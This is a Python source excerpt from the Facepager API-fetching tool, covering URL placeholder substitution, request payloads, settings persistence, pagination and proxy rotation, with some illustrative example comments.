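#   self.parsePlaceholders("users/<Object ID>/friends", nodedata)
#   # -> "users/12345/friends"
#   self.parsePlaceholders("<name>", nodedata)
#   # -> "Alice"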
def getURL(self, urlpath, params, nodedata,options):
"""
Replaces the Facepager placeholders (angle brackets, "<...>")
with the Object ID or any other Facepager placeholder value.
Example: http://www.facebook.com/<Object-ID>/friends
"""
urlpath, urlparams = self.parseURL(urlpath)
# Filter empty params
params = {name: params[name] for name in params if (name != '') and (name != '<None>') and (params[name] != '<None>')}
# Collect template parameters (= placeholders)
templateparams = {}
for name in params:
match = re.match(r"^<(.*)>$", str(name))
if match:
# Replace placeholders in parameter value
value = self.parsePlaceholders(params[name], nodedata, {}, options)
templateparams[match.group(1)] = value
# Replace placeholders in parameters
for name in params:
match = re.match(r"^<(.*)>$", str(name))
if not match:
# Replace placeholders in parameter value
value = self.parsePlaceholders(params[name], nodedata, templateparams, options)
if isinstance(value,list):
urlparams[name] = [str(x) for x in value]
else:
urlparams[name] = str(value)
# Replace placeholders in urlpath
urlpath = self.parsePlaceholders(urlpath, nodedata, templateparams)
return urlpath, urlparams, templateparams
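# Illustrative sketch for getURL() above (hypothetical endpoint and parameters):
# parameters whose *name* is wrapped in angle brackets become template parameters
# and are removed from the query; placeholders in the remaining values and in the
# path are then expanded.
#
#   params = {'<user>': '<Object ID>', 'fields': 'id,name'}
#   urlpath, urlparams, templateparams = self.getURL(
#       "https://api.example.com/<user>/posts", params, nodedata, options)
#   # urlpath        -> "https://api.example.com/12345/posts"   (for objectid 12345)
#   # urlparams      -> {'fields': 'id,name'}
#   # templateparams -> {'user': '12345'}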
def getLogURL(self, urlpath, urlparams, options, removesecrets=True):
url = urlpath
# Convert to list of tuple to allow duplicated keys
if urlparams:
urltuples = dictToTuples(urlparams)
urltuples = urllib.parse.urlencode(urltuples)
if removesecrets:
urltuples = urltuples.replace(options.get('access_token', ''), '')
url += "?" + urltuples
return url
def getPayload(self,payload, params, nodedata,options, logProgress=None):
#Return nothing
if (payload is None) or (payload == ''):
return None
# Parse JSON and replace placeholders in values
elif options.get('encoding','<None>') == 'multipart/form-data':
#payload = json.loads(payload)
for name in payload:
value = payload[name]
try:
value = json.loads(value)
except:
pass
# Files (convert dict to tuple)
if isinstance(value,dict):
filename = self.parsePlaceholders(value.get('name',''), nodedata, params,options)
filedata = self.parsePlaceholders(value.get('data',''), nodedata, params,options)
filetype = self.parsePlaceholders(value.get('type',''), nodedata, params,options)
payload[name] = (filename,filedata,filetype)
# Strings
else:
value = payload[name]
payload[name] = self.parsePlaceholders(value, nodedata, params,options)
def callback(monitor):
if logProgress is not None:
logProgress({'current': monitor.bytes_read, 'total': monitor.len})
payload = MultipartEncoder(fields=payload)
payload = MultipartEncoderMonitor(payload,callback)
return payload
# Replace placeholders in string and setup progress callback
else:
def callback(current, total):
if logProgress is not None:
logProgress({'current': current, 'total': total})
payload = self.parsePlaceholders(payload, nodedata, params,options)
payload = BufferReader(payload,callback)
return payload
# Gets data from input fields or defaults (never gets credentials from default values!)
def getSettings(self, purpose='fetch'): # purpose = 'fetch'|'settings'|'preset'
options = {}
defaults = self.getDefaultAndDocOptions()
#options['module'] = self.name
#options for request
try:
options['basepath'] = self.basepathEdit.currentText().strip()
options['resource'] = self.resourceEdit.currentText().strip()
options['params'] = self.paramEdit.getParams()
except AttributeError:
pass
# Extension (for Twitter, deprecated)
options['extension'] = defaults.get('extension','')
if (options['extension'] != '') and options['resource'].endswith(options['extension']):
options['extension'] = ''
#headers and verbs
try:
options['headers'] = self.headerEdit.getParams()
options['verb'] = self.verbEdit.currentText().strip()
except AttributeError:
pass
#
# # Get doc key for lookup of data handling keys
# doc_resource = options.get('resource', '').strip()
# if doc_resource == '':
# doc_resource = '0'
#format
try:
options['format'] = self.formatEdit.currentText().strip()
except AttributeError:
pass
#payload
try:
if options.get('verb','GET') in ['POST','PUT','PATCH']:
options['encoding'] = self.encodingEdit.currentText().strip()
if options['encoding'] == 'multipart/form-data':
options['payload'] = self.multipartEdit.getParams()
else:
options['payload'] = self.payloadEdit.toPlainText()
except AttributeError:
pass
try:
options['filename'] = self.filenameEdit.currentText()
options['fileext'] = self.fileextEdit.currentText()
except AttributeError:
pass
#paging
try:
options['pages'] = self.pagesEdit.value()
except AttributeError:
pass
try:
options['paging_type'] = self.pagingTypeEdit.currentText().strip() if self.pagingTypeEdit.currentText() != "" else defaults.get('paging_type', '')
options['key_paging'] = self.pagingkeyEdit.text() if self.pagingkeyEdit.text() != "" else defaults.get('key_paging',None)
options['paging_stop'] = self.pagingstopEdit.text() if self.pagingstopEdit.text() != "" else defaults.get('paging_stop',None)
options['param_paging'] = self.pagingparamEdit.text() if self.pagingparamEdit.text() != "" else defaults.get('param_paging',None)
options['offset_start'] = self.offsetStartEdit.value()
options['offset_step'] = self.offsetStepEdit.value()
except AttributeError:
options['paging_type'] = defaults.get('paging_type')
options['key_paging'] = defaults.get('key_paging')
options['paging_stop'] = defaults.get('paging_stop')
options['param_paging'] = defaults.get('param_paging')
options['offset_start'] = 1
options['offset_step'] = 1
if options.get('paging_type') == 'url':
options.pop('paging_stop')
options.pop('param_paging')
options.pop('offset_start')
options.pop('offset_step')
elif options.get('paging_type') == 'decrease':
options.pop('offset_start')
options.pop('offset_step')
options.pop('paging_stop')
elif options.get('paging_type') == 'key':
options.pop('offset_start')
options.pop('offset_step')
elif options.get('paging_type') == 'count':
options.pop('key_paging')
options.pop('paging_stop')
#options for data handling
try:
options['nodedata'] = self.extractEdit.text() if self.extractEdit.text() != "" else defaults.get('nodedata')
options['objectid'] = self.objectidEdit.text() if self.objectidEdit.text() != "" else defaults.get('objectid')
except AttributeError:
options['nodedata'] = defaults.get('nodedata')
options['objectid'] = defaults.get('objectid')
# Scopes
try:
options['scope'] = self.scopeEdit.text().strip()
except AttributeError:
pass
try:
options['proxy'] = self.proxyEdit.text().strip()
except AttributeError:
pass
# Options not saved to preset but to settings
if purpose != 'preset':
# query type
options['querytype'] = self.name + ':' + self.resourceEdit.currentText()
# uploadfolder
try:
options['folder'] = self.folderEdit.text()
except AttributeError:
pass
# download folder
try:
options['downloadfolder'] = self.downloadfolderEdit.text()
except AttributeError:
pass
try:
options['access_token'] = self.tokenEdit.text()
except AttributeError:
pass
try:
options['access_token_secret'] = self.tokensecretEdit.text()
except AttributeError:
pass
try:
options['client_id'] = self.clientIdEdit.text()
except AttributeError:
pass
try:
options['client_secret'] = self.clientSecretEdit.text()
except AttributeError:
pass
return options
def updateBasePath(self, options=None):
if options is None:
basepath = self.basepathEdit.currentText().strip()
options = {'basepath' : basepath}
else:
basepath = options.get('basepath', '')
self.basepathEdit.setEditText(basepath)
index = self.basepathEdit.findText(basepath)
if index != -1:
self.basepathEdit.setCurrentIndex(index)
# Get general doc
apidoc = self.mainWindow.apiWindow.getApiDoc(self.name, basepath)
# apidoc = self.basepathEdit.itemData(index, Qt.UserRole)
# Add the endpoints defined in the API doc
self.resourceEdit.clear()
if apidoc and isinstance(apidoc, dict):
endpoints = apidoc.get("paths", {})
paths = endpoints.keys()
for path in list(paths):
operations = endpoints[path]
path = path.replace("{", "<").replace("}", ">")
self.resourceEdit.addItem(path)
idx = self.resourceEdit.count() - 1
self.resourceEdit.setItemData(idx, wraptip(getDictValue(operations, "get.summary", "")), Qt.ToolTipRole)
# store params for later use in onChangedResource
self.resourceEdit.setItemData(idx, operations, Qt.UserRole)
self.buttonApiHelp.setVisible(True)
else:
self.resourceEdit.insertItem(0, "/<Object ID>")
def updateResource(self, options=None):
if options is None:
resource = self.resourceEdit.currentText().strip()
options = {'resource' : resource}
else:
resource = options.get('resource', '')
self.resourceEdit.setEditText(resource)
index = self.resourceEdit.findText(resource)
if index != -1:
self.resourceEdit.setCurrentIndex(index)
operations = self.resourceEdit.itemData(index, Qt.UserRole)
params = getDictValue(operations, "get.parameters", False) if operations else []
# Set param names
self.paramEdit.setNameOptionsAll(params)
# Populates input fields from loaded options and presets
# Select boxes are updated by onChangedBasepath and onChangedResource
# based on the API docs.
# @settings Dict with options
def setSettings(self, settings = {}):
# Base path
options = self.getDefaultAndDocOptions(settings)
self.updateBasePath(options)
# Resource
options = self.getDefaultAndDocOptions(settings)
self.updateResource(options)
# Params and Options
options = self.getDefaultAndDocOptions(settings)
self.updateParams(options)
self.updateOptions(options)
return options
def updateParams(self, options):
self.paramEdit.setParams(options.get('params', ''))
def updateOptions(self, options):
# Header and method
try:
self.headerEdit.setParams(options.get('headers', {}))
self.verbEdit.setCurrentIndex(self.verbEdit.findText(options.get('verb', 'GET')))
self.encodingEdit.setCurrentIndex(self.encodingEdit.findText(options.get('encoding', '<None>')))
if options.get('encoding', '<None>') == 'multipart/form-data':
self.multipartEdit.setParams(options.get('payload', {}))
else:
self.payloadEdit.setPlainText(options.get('payload', ''))
self.verbChanged()
except AttributeError:
pass
# Format
try:
self.formatEdit.setCurrentIndex(self.formatEdit.findText(options.get('format', 'json')))
except AttributeError:
pass
# Upload folder
try:
if 'folder' in options:
self.folderEdit.setText(options.get('folder'))
except AttributeError:
pass
# Download folder
try:
if 'downloadfolder' in options:
self.downloadfolderEdit.setText(options.get('downloadfolder'))
except AttributeError:
pass
try:
self.filenameEdit.setEditText(options.get('filename', '<None>'))
self.fileextEdit.setEditText(options.get('fileext', '<None>'))
except AttributeError:
pass
# Paging
try:
self.pagesEdit.setValue(int(options.get('pages', 1)))
except AttributeError:
pass
try:
self.pagingTypeEdit.setCurrentIndex(
self.pagingTypeEdit.findText(options.get('paging_type', 'key')))
self.pagingkeyEdit.setText(options.get('key_paging', ''))
self.pagingstopEdit.setText(options.get('paging_stop', ''))
self.pagingparamEdit.setText(options.get('param_paging', ''))
self.offsetStartEdit.setValue(int(options.get('offset_start', 1)))
self.offsetStepEdit.setValue(int(options.get('offset_step', 1)))
self.pagingChanged()
except AttributeError:
pass
# Extract options
try:
self.extractEdit.setText(options.get('nodedata'))
self.objectidEdit.setText(options.get('objectid'))
except AttributeError:
pass
# Scope
try:
self.scopeEdit.setText(options.get('scope', ''))
except AttributeError:
pass
# Proxy
try:
self.proxyEdit.setText(options.get('proxy', ''))
except AttributeError:
pass
# Credentials
try:
if 'access_token' in options:
self.tokenEdit.setText(options.get('access_token', ''))
if 'access_token_secret' in options:
self.tokensecretEdit.setText(options.get('access_token_secret', ''))
if 'client_id' in options:
self.clientIdEdit.setText(options.get('client_id', ''))
if 'client_secret' in options:
self.clientSecretEdit.setText(options.get('client_secret', ''))
except AttributeError:
pass
def saveSettings(self):
self.mainWindow.settings.beginGroup("ApiModule_" + self.name)
options = self.getSettings('settings')
for key in list(options.keys()):
self.mainWindow.settings.setValue(key, options[key])
self.mainWindow.settings.endGroup()
def loadSettings(self):
self.mainWindow.settings.beginGroup("ApiModule_" + self.name)
options = {}
for key in self.mainWindow.settings.allKeys():
options[key] = self.mainWindow.settings.value(key)
self.mainWindow.settings.endGroup()
self.setSettings(options)
@Slot(str)
def logMessage(self,message):
self.mainWindow.logmessage(message)
def reloadDoc(self):
self.saveSettings()
self.loadDoc()
self.loadSettings()
def loadDoc(self):
'''
Loads and prepares documentation
'''
# Add base paths
self.basepathEdit.clear()
urls = self.mainWindow.apiWindow.getApiBasePaths(self.name)
self.basepathEdit.insertItems(0,urls)
# TODO: set API Docs as item data
def showDoc(self):
'''
Open window with documentation
'''
basepath = self.basepathEdit.currentText().strip()
path = self.resourceEdit.currentText().strip()
self.mainWindow.apiWindow.showDoc(self.name, basepath, path)
def getDefaultAndDocOptions(self, options = {}):
# Set default options
defaults = self.defaults.copy()
defaults.update(self.getDocOptions())
defaults.update(options)
return defaults
def getDocOptions(self):
# def getFromDoc(self, dockey, defaultkey=None):
# dockey = dockey.replace("<", "{").replace(">", "}")
# value = getDictValue(self.apidoc, dockey, dump=False, default=None)
# if (value is None) and (defaultkey is not None):
# value = self.defaults.get(defaultkey)
# return value
# Get general doc
basepath = self.basepathEdit.currentText().strip()
apidoc = self.mainWindow.apiWindow.getApiDoc(self.name,basepath)
# Get response doc
resourceidx = self.resourceEdit.findText(self.resourceEdit.currentText())
operations = self.resourceEdit.itemData(resourceidx,Qt.UserRole) if resourceidx != -1 else {}
schema = getDictValue(operations, "get.responses.200.content.application/json.schema", []) if operations else []
options = {}
# Params
params = getDictValue(operations, "get.parameters", False) if operations else []
defaultparams = {}
for param in params:
# Default values for required params
if param.get("required", False) or param.get("x-facepager-default", False):
name = param.get("name", "")
name = "<" + name + ">" if param.get("in", "query") == "path" else name
value = param.get("example", "<Object ID>")
defaultparams[name] = value
options['params'] = defaultparams
# Path extension for Twitter (deprecated)
options['extension'] = getDictValue(apidoc, "servers.0.x-facepager-suffix")
# Default extract settings
options['objectid'] = getDictValueOrNone(apidoc, "x-facepager-objectid")
options['nodedata'] = getDictValueOrNone(apidoc, "x-facepager-extract")
# Default pagination settings
pagination = getDictValueOrNone(apidoc, "x-facepager-pagination", dump=False)
options['paging_type'] = getDictValueOrNone(pagination, 'method')
options['param_paging'] = getDictValueOrNone(pagination, 'param')
options['key_paging'] = getDictValueOrNone(pagination, 'key')
options['paging_stop'] = getDictValueOrNone(pagination, 'stop')
# Default authorization settings
authorization = getDictValueOrNone(apidoc, "x-facepager-authorization", dump=False)
options['auth_type'] = getDictValueOrNone(authorization, 'auth_type')
options['auth_uri'] = getDictValueOrNone(authorization, 'auth_uri')
options['auth_tokenuri'] = getDictValueOrNone(authorization, 'token_uri')
options['auth'] = getDictValueOrNone(authorization, 'auth_method')
options['auth_tokenname'] = getDictValueOrNone(authorization, 'token_name')
# Extract options from response reference
if 'x-facepager-extract' in schema:
options['nodedata'] = schema.get('x-facepager-extract')
if 'x-facepager-objectid' in schema:
options['objectid'] = schema.get('x-facepager-objectid')
options = {k: v for k, v in options.items() if v is not None}
return options
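# Illustrative sketch for getDocOptions() above (hypothetical API doc): the custom
# x-facepager-* extension keys looked up in an OpenAPI 3 document roughly follow
# this shape; all names and values below are made up for illustration.
#
#   {
#     "x-facepager-objectid": "id",
#     "x-facepager-extract": "data",
#     "x-facepager-pagination": {"method": "key", "key": "paging.next", "param": "cursor"},
#     "x-facepager-authorization": {"auth_type": "OAuth2", "auth_method": "header",
#                                   "token_name": "Authorization"},
#     "servers": [{"url": "https://api.example.com", "x-facepager-suffix": ""}],
#     "paths": {"/items": {"get": {"parameters": [
#         {"name": "limit", "in": "query", "required": true, "example": "10"}]}}}
#   }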
def initInputs(self):
'''
Create base path edit, resource edit and param edit
Set resource according to the APIdocs, if any docs are available
'''
#Base path
self.basepathEdit = QComboBox(self)
if not self.defaults.get('basepath',None) is None:
self.basepathEdit.insertItems(0, [self.defaults.get('basepath','')])
self.basepathEdit.setEditable(True)
self.mainLayout.addRow("Base path", self.basepathEdit)
self.basepathEdit.currentIndexChanged.connect(self.onChangedBasepath)
#Resource
self.resourceLayout = QHBoxLayout()
self.actionApiHelp = QAction('Open documentation if available.',self)
self.actionApiHelp.setText('?')
self.actionApiHelp.triggered.connect(self.showDoc)
self.buttonApiHelp = QToolButton(self)
self.buttonApiHelp.setToolButtonStyle(Qt.ToolButtonTextOnly)
self.buttonApiHelp.setDefaultAction(self.actionApiHelp)
self.buttonApiHelp.setVisible(False)
self.resourceEdit = QComboBox(self)
self.resourceEdit.setEditable(True)
self.resourceLayout.addWidget(self.resourceEdit)
self.resourceLayout.addWidget(self.buttonApiHelp)
self.mainLayout.addRow("Resource", self.resourceLayout)
#Parameters
self.paramEdit = QParamEdit(self)
self.mainLayout.addRow("Parameters", self.paramEdit)
self.resourceEdit.currentIndexChanged.connect(self.onChangedResource)
def getFileFolderName(self,options, nodedata):
# Folder
foldername = options.get('downloadfolder', None)
if foldername == '':
foldername = None
# File
filename = options.get('filename', None)
if (filename is not None) and (filename == '<None>'):
filename = None
else:
filename = self.parsePlaceholders(filename,nodedata)
if filename == '':
filename = None
# Extension
fileext = options.get('fileext', None)
if fileext is not None and fileext == '<None>':
fileext = None
elif fileext is not None and fileext != '':
fileext = self.parsePlaceholders(fileext,nodedata)
return (foldername,filename,fileext)
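# Illustrative sketch for getFileFolderName() above (hypothetical values): the
# download settings are resolved into a (foldername, filename, fileext) tuple;
# '<None>' or empty selections become None and filename placeholders are expanded.
#
#   self.getFileFolderName(options, nodedata)
#   # -> ('/home/user/downloads', '12345', '.json')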
# Upload folder
def initUploadFolderInput(self):
self.folderwidget = QWidget()
folderlayout = QHBoxLayout()
folderlayout.setContentsMargins(0,0,0,0)
self.folderwidget.setLayout(folderlayout)
self.folderEdit = QLineEdit()
folderlayout.addWidget(self.folderEdit)
self.folderButton = QPushButton("...", self)
self.folderButton.clicked.connect(self.selectFolder)
folderlayout.addWidget(self.folderButton)
self.mainLayout.addRow("Upload folder", self.folderwidget)
# Download folder
def initFileInputs(self):
self.downloadfolderwidget = QWidget()
folderlayout = QHBoxLayout()
folderlayout.setContentsMargins(0,0,0,0)
self.downloadfolderwidget.setLayout(folderlayout)
# Folder edit
self.downloadfolderEdit = QLineEdit()
self.downloadfolderEdit.setToolTip(wraptip("Select a folder if you want to save the responses to files."))
folderlayout.addWidget(self.downloadfolderEdit,2)
# Select folder button
self.actionDownloadFolder = QAction('...',self)
self.actionDownloadFolder.setText('..')
self.actionDownloadFolder.triggered.connect(self.selectDownloadFolder)
self.downloadfolderButton = QToolButton(self)
self.downloadfolderButton.setToolButtonStyle(Qt.ToolButtonTextOnly)
self.downloadfolderButton.setDefaultAction(self.actionDownloadFolder)
folderlayout.addWidget(self.downloadfolderButton,0)
# filename
folderlayout.addWidget(QLabel("Filename"),0)
self.filenameEdit = QComboBox(self)
self.filenameEdit.setToolTip(wraptip("Set the filename if you want to save the responses to files. <Object ID> usually is a good choice."))
self.filenameEdit.insertItems(0, ['<Object ID>','<None>'])
self.filenameEdit.setEditable(True)
folderlayout.addWidget(self.filenameEdit,1)
# fileext
folderlayout.addWidget(QLabel("Custom file extension"),0)
self.fileextEdit = QComboBox(self)
self.fileextEdit.setToolTip(wraptip("Set the extension of the files, for example .json, .txt or .html. Set to <None> to automatically guess from the response."))
self.fileextEdit.insertItems(0, ['<None>','.html','.txt'])
self.fileextEdit.setEditable(True)
folderlayout.addWidget(self.fileextEdit,1)
#layout.setStretch(2, 1)
self.extraLayout.addRow("Download", self.downloadfolderwidget)
def pagingChanged(self):
if self.pagingTypeEdit.currentText() == "count":
self.pagingParamWidget.show()
self.pagingStepsWidget.show()
self.pagingKeyWidget.hide()
elif self.pagingTypeEdit.currentText() == "url":
self.pagingParamWidget.hide()
self.pagingStepsWidget.hide()
self.pagingKeyWidget.show()
else:
self.pagingParamWidget.show()
self.pagingStepsWidget.hide()
self.pagingKeyWidget.show()
if self.pagingTypeEdit.count() < 2:
self.pagingTypeEdit.hide()
def initPagingInputs(self,keys = False):
layout= QHBoxLayout()
if keys:
# Paging type
self.pagingTypeEdit = QComboBox(self)
self.pagingTypeEdit.addItem('key')
self.pagingTypeEdit.addItem('count')
self.pagingTypeEdit.addItem('url')
self.pagingTypeEdit.setToolTip(wraptip("Select 'key' if the response contains data about the next page, e.g. page number or offset. Select 'count' if you want to increase the paging param by a fixed amount. Select 'url' if the response contains a complete URL to the next page."))
self.pagingTypeEdit.currentIndexChanged.connect(self.pagingChanged)
layout.addWidget(self.pagingTypeEdit)
layout.setStretch(0, 0)
# Paging param
self.pagingParamWidget = QWidget()
self.pagingParamLayout = QHBoxLayout()
self.pagingParamLayout.setContentsMargins(0, 0, 0, 0)
self.pagingParamWidget.setLayout(self.pagingParamLayout)
self.pagingParamLayout.addWidget(QLabel("Param"))
self.pagingparamEdit = QLineEdit(self)
self.pagingparamEdit.setToolTip(wraptip("This parameter will be added to the query if you select key-pagination. The value is extracted by the paging key."))
self.pagingParamLayout.addWidget(self.pagingparamEdit)
self.pagingParamLayout.setStretch(0,0)
self.pagingParamLayout.setStretch(1, 0)
layout.addWidget(self.pagingParamWidget)
layout.setStretch(1, 2)
# Paging key
self.pagingKeyWidget = QWidget()
self.pagingKeyLayout = QHBoxLayout()
self.pagingKeyLayout.setContentsMargins(0, 0, 0, 0)
self.pagingKeyWidget.setLayout(self.pagingKeyLayout)
self.pagingKeyLayout.addWidget(QLabel("Paging key"))
self.pagingkeyEdit = QLineEdit(self)
self.pagingkeyEdit.setToolTip(wraptip("If the response contains data about the next page, specify the key. The value will be added as paging parameter or used as the URL."))
self.pagingKeyLayout.addWidget(self.pagingkeyEdit)
self.pagingKeyLayout.setStretch(0, 0)
self.pagingKeyLayout.setStretch(1, 1)
layout.addWidget(self.pagingKeyWidget)
layout.setStretch(2, 2)
# Page steps
self.pagingStepsWidget = QWidget()
self.pagingStepsLayout = QHBoxLayout()
self.pagingStepsLayout.setContentsMargins(0, 0, 0, 0)
self.pagingStepsWidget.setLayout(self.pagingStepsLayout)
self.pagingStepsLayout.addWidget(QLabel("Start value"))
self.offsetStartEdit = QSpinBox(self)
self.offsetStartEdit.setValue(1)
self.offsetStartEdit.setToolTip(wraptip("First page or offset number, defaults to 1"))
self.pagingStepsLayout.addWidget(self.offsetStartEdit)
self.pagingStepsLayout.setStretch(0, 0)
self.pagingStepsLayout.setStretch(1, 1)
self.pagingStepsLayout.addWidget(QLabel("Step"))
self.offsetStepEdit = QSpinBox(self)
self.offsetStepEdit.setMaximum(10000)
self.offsetStepEdit.setValue(1)
self.offsetStepEdit.setToolTip(wraptip("Amount to increase for each page, defaults to 1"))
self.pagingStepsLayout.addWidget(self.offsetStepEdit)
self.pagingStepsLayout.setStretch(2, 0)
self.pagingStepsLayout.setStretch(3, 1)
layout.addWidget(self.pagingStepsWidget)
layout.setStretch(3, 1)
# Stop if
layout.addWidget(QLabel("Stop key"))
self.pagingstopEdit = QLineEdit(self)
self.pagingstopEdit.setToolTip(wraptip("Stops fetching data as soon as the given key is present but empty or false. For example, stops fetching if the value of 'hasNext' is false, None or an empty list. Usually you can leave the field blank, since fetching will stop anyway when the paging key is empty."))
layout.addWidget(self.pagingstopEdit)
layout.setStretch(4, 0)
layout.setStretch(5, 1)
#Page count
layout.addWidget(QLabel("Maximum pages"))
self.pagesEdit = QSpinBox(self)
self.pagesEdit.setMinimum(1)
self.pagesEdit.setMaximum(50000)
self.pagesEdit.setToolTip(wraptip("Maximum number of pages to fetch."))
layout.addWidget(self.pagesEdit)
layout.setStretch(6, 0)
layout.setStretch(7, 0)
rowcaption = "Paging"
else:
#Page count
self.pagesEdit = QSpinBox(self)
self.pagesEdit.setMinimum(1)
self.pagesEdit.setMaximum(50000)
layout.addWidget(self.pagesEdit)
rowcaption = "Maximum pages"
self.extraLayout.addRow(rowcaption, layout)
def initHeaderInputs(self):
self.headerEdit = QParamEdit(self)
self.mainLayout.addRow("Headers", self.headerEdit)
def initVerbInputs(self):
# Verb and encoding
self.verbEdit = QComboBox(self)
self.verbEdit.addItems(['GET','HEAD','POST','PUT','PATCH','DELETE'])
self.verbEdit.currentIndexChanged.connect(self.verbChanged)
self.encodingLabel = QLabel("Encoding")
self.encodingEdit = QComboBox(self)
self.encodingEdit.addItems(['<None>','multipart/form-data'])
self.encodingEdit.currentIndexChanged.connect(self.verbChanged)
layout= QHBoxLayout()
layout.addWidget(self.verbEdit)
layout.setStretch(0, 1)
layout.addWidget(self.encodingLabel)
layout.addWidget(self.encodingEdit)
layout.setStretch(2, 1)
self.mainLayout.addRow("Method", layout)
# Payload
self.payloadWidget = QWidget()
self.payloadLayout = QHBoxLayout()
self.payloadLayout.setContentsMargins(0,0,0,0)
self.payloadWidget.setLayout(self.payloadLayout)
self.payloadEdit = QPlainTextEdit()
self.payloadEdit.setLineWrapMode(QPlainTextEdit.NoWrap)
self.payloadLayout.addWidget(self.payloadEdit)
self.payloadLayout.setStretch(0, 1)
self.multipartEdit = QParamEdit()
self.payloadLayout.addWidget(self.multipartEdit)
self.payloadLayout.setStretch(0, 1)
self.payloadLayout.setStretch(2, 1)
self.mainLayout.addRow("Payload", self.payloadWidget)
def verbChanged(self):
if self.verbEdit.currentText() in ['GET','DELETE','HEAD']:
self.payloadWidget.hide()
self.mainLayout.labelForField(self.payloadWidget).hide()
self.encodingEdit.hide()
self.encodingLabel.hide()
self.folderwidget.hide()
self.mainLayout.labelForField(self.folderwidget).hide()
else:
self.payloadWidget.show()
self.mainLayout.labelForField(self.payloadWidget).show()
#Encoding
self.encodingEdit.show()
self.encodingLabel.show()
#Multipart
if self.encodingEdit.currentText().strip() == 'multipart/form-data':
self.multipartEdit.show()
self.payloadEdit.hide()
#self.payloadEdit.setPlainText(json.dumps(self.multipartEdit.getParams(),indent=4,))
else:
self.payloadEdit.show()
self.multipartEdit.hide()
#Folder
self.folderwidget.show()
self.mainLayout.labelForField(self.folderwidget).show()
def initResponseInputs(self, format=False):
layout= QHBoxLayout()
if not format:
#Extract
self.extractEdit = QLineEdit(self)
layout.addWidget(self.extractEdit)
layout.setStretch(0, 1)
layout.addWidget(QLabel("Key for Object ID"))
self.objectidEdit = QLineEdit(self)
layout.addWidget(self.objectidEdit)
layout.setStretch(2, 1)
#Add layout
self.extraLayout.addRow("Key to extract", layout)
else:
# Format
self.formatEdit = QComboBox(self)
self.formatEdit.addItems(['json', 'text', 'links','xml','file'])
self.formatEdit.setToolTip("<p>JSON: default option, data will be parsed as JSON. </p> \
<p>Text: data will not be parsed and embedded in JSON. </p> \
<p>Links: data will be parsed as xml and links will be extracted (set key to extract to 'links' and key for Object ID to 'url'). </p> \
<p>XML: data will be parsed as XML and converted to JSON. </p> \
<p>File: data will only be downloaded to files, specify download folder and filename.</p>")
layout.addWidget(self.formatEdit)
layout.setStretch(0, 0)
# self.formatEdit.currentIndexChanged.connect(self.formatChanged)
# Extract
layout.addWidget(QLabel("Key to extract"))
self.extractEdit = QLineEdit(self)
self.extractEdit.setToolTip(wraptip(
"If your data contains a list of objects, set the key of the list. Every list element will be adeded as a single node. Remaining data will be added as offcut node."))
layout.addWidget(self.extractEdit)
layout.setStretch(1, 0)
layout.setStretch(2, 2)
layout.addWidget(QLabel("Key for Object ID"))
self.objectidEdit = QLineEdit(self)
self.objectidEdit.setToolTip(
wraptip("If your data contains unique IDs for every node, define the corresponding key."))
layout.addWidget(self.objectidEdit)
layout.setStretch(3, 0)
layout.setStretch(4, 2)
# Add layout
self.extraLayout.addRow("Response", layout)
@Slot()
def onChangedBasepath(self, index = None):
'''
Handles the automated resource suggestion for the
selected API based on the OpenAPI specification 3.0.0
'''
if index is None:
index = self.basepathEdit.findText(self.basepathEdit.currentText())
if index != -1:
self.basepathEdit.setCurrentIndex(index)
self.updateBasePath()
self.updateResource()
defaults = self.getDefaultAndDocOptions()
self.updateParams(defaults)
self.updateOptions(defaults)
@Slot()
def onChangedResource(self, index = None):
'''
Handles the automated parameter suggestion for the
selected API endpoint based on the OpenAPI specification 3.0.0
'''
if index is None:
index = self.resourceEdit.findText(self.resourceEdit.currentText())
if index != -1:
self.resourceEdit.setCurrentIndex(index)
self.updateResource()
defaults = self.getDefaultAndDocOptions()
self.updateParams(defaults)
self.updateOptions(defaults)
@Slot()
def onChangedParam(self,index=0):
pass
def getProxies(self, reload=False):
if not hasattr(self, "proxies") or reload:
self.proxies = {}
if hasattr(self, "proxyEdit"):
self.proxies = self.proxyEdit.text().strip()
self.proxies = self.proxies.split(";")
if len(self.proxies) == 0:
proxy = ""
elif len(self.proxies) == 1:
proxy = self.proxies[0]
else:
proxy = self.proxies[0]
self.proxies = self.proxies[1:] + self.proxies[:1]
if proxy.startswith('http'):
proxy_http = "http://"+re.sub('^https?://', '', proxy)
proxy_https = "https://" + re.sub('^https?://', '', proxy)
return {'http': proxy_http, 'https': proxy_https}
elif proxy != "":
return {'http': proxy, 'https': proxy}
else:
return {}
# if not hasattr(self,"proxies") or reload:
# try:
# filename = os.path.join(os.path.expanduser("~"), 'Facepager','proxies.json')
# if os.path.exists(filename):
# with open(filename, 'r', encoding='utf-8') as f:
# self.proxies = json.load(f)
# else:
# self.proxies = {}
# except Exception as e:
# self.logMessage("Error loading proxies: {}".format(str(e)))
# self.proxies = {}
#
# return proxy
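# Illustrative sketch for getProxies() above (hypothetical proxies): the proxy
# field may contain several proxies separated by semicolons; they are rotated
# round-robin between calls.
#
#   self.proxyEdit.setText("http://proxy1.example.com:8080;http://proxy2.example.com:8080")
#   self.getProxies(reload=True)
#   # -> {'http': 'http://proxy1.example.com:8080', 'https': 'https://proxy1.example.com:8080'}
#   self.getProxies()
#   # -> {'http': 'http://proxy2.example.com:8080', 'https': 'https://proxy2.example.com:8080'}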
def initPagingOptions(self, data, options):
# Only fetch nodes without previously fetched data if requested
if options.get('emptyonly', False):
lastdata = getDictValueOrNone(options, 'lastdata', dump=False)
if lastdata is not None:
return None
# paging by auto count
if (options.get('paging_type') == "count") and (options.get('param_paging', '') is not None):
offset = options.get('offset_start', 1)
options['params'][options.get('param_paging', '')] = offset
# paging by key (continue previous fetching process based on last fetched child offcut node)
elif (options.get('paging_type') == "key") and (options.get('key_paging') is not None) and (options.get('param_paging') is not None):
# Get cursor of last offcut node
offcut = getDictValueOrNone(options, 'lastdata.response', dump=False)
cursor = getDictValueOrNone(offcut,options.get('key_paging'))
stopvalue = not extractValue(offcut,options.get('paging_stop'), dump = False, default = True)[1]
# Don't fetch if already finished (= offcut without next cursor)
if options.get('resume',False) and (offcut is not None) and ((cursor is None) or stopvalue):
return None
# Continue / start fetching
elif (cursor is not None) :
options['params'][options['param_paging']] = cursor
# url based paging
elif (options.get('paging_type') == "url") and (options.get('key_paging') is not None):
offcut = getDictValueOrNone(options, 'lastdata.response', dump=False)
url = getDictValueOrNone(offcut,options.get('key_paging'))
# Don't fetch if already finished (= offcut without next cursor)
if options.get('resume',False) and (offcut is not None) and (url is None):
return None
if url is not None:
url, params = self.parseURL(url)
options['params'] = params
options['url'] = url
